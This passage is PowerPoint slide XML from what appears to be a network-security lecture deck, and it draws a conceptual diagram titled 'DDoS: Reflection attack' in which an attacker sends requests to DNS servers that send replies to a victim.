            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker to flood a target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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{DF03DA07-AF40-4F3D-9A77-60B675B0D91A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11607800" cy="10668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DDoS: Reflection attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31748" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3835400" y="3505200"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31785" name="Freeform 4"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31786" name="Object 5"/>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spid="_x0000_s31903" name="Clip" r:id="rId4" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="1307079" imgH="1083682"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31749" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4848225" y="1917700"/>
            <a:ext cx="1735138" cy="1649413"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31783" name="Freeform 7"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31784" name="Object 8"/>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spid="_x0000_s31904" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">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31750" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3713163" y="5476875"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31781" name="Freeform 10"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31782" name="Object 11"/>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spid="_x0000_s31905" name="Clip" r:id="rId7" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="1307079" imgH="1083682" progId="">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31751" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5106988" y="7553325"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31779" name="Freeform 13"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31780" name="Object 14"/>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spid="_x0000_s31906" name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6492875" y="3471863"/>
            <a:ext cx="4244975" cy="430371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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="31753" name="Object 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11296650" y="5661025"/>
          <a:ext cx="869950" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s31907" name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">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96650" y="5661025"/>
                        <a:ext cx="869950" cy="741363"/>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1754" name="Object 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1509713" y="4556125"/>
          <a:ext cx="869950" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s31908" name="Clip" r:id="rId10" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId10" imgW="1307079" imgH="1083682" progId="">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9713" y="4556125"/>
                        <a:ext cx="869950" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6240463" y="2898775"/>
            <a:ext cx="4991100" cy="2879725"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31756" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5327650" y="4338638"/>
            <a:ext cx="5867400" cy="1651000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5273675" y="6130925"/>
            <a:ext cx="5957888" cy="34925"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31758" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6610350" y="6376988"/>
            <a:ext cx="4638675" cy="1651000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31759" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2425700" y="2968625"/>
            <a:ext cx="2689225" cy="1649413"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31760" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2568575" y="4497388"/>
            <a:ext cx="1562100" cy="473075"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="5199063"/>
            <a:ext cx="1528763" cy="738187"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31762" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="5356225"/>
            <a:ext cx="3200400" cy="2813050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31763" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1231900" y="5438775"/>
            <a:ext cx="1082675" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31764" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11280775" y="6388100"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31765" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5359400" y="8507413"/>
            <a:ext cx="1455738" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31766" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3987800" y="6450013"/>
            <a:ext cx="1455738" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31767" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4064000" y="4495800"/>
            <a:ext cx="1455738" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31768" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5054600" y="2895600"/>
            <a:ext cx="1455738" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31769" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2179638" y="3729038"/>
            <a:ext cx="1031875" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31770" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894013" y="4176713"/>
            <a:ext cx="1031875" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31771" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3286125" y="5195888"/>
            <a:ext cx="1031875" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31772" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3074988" y="6923088"/>
            <a:ext cx="1031875" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31773" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8220075" y="3711575"/>
            <a:ext cx="763588" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31774" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="4481513"/>
            <a:ext cx="763588" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31775" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7797800" y="6107113"/>
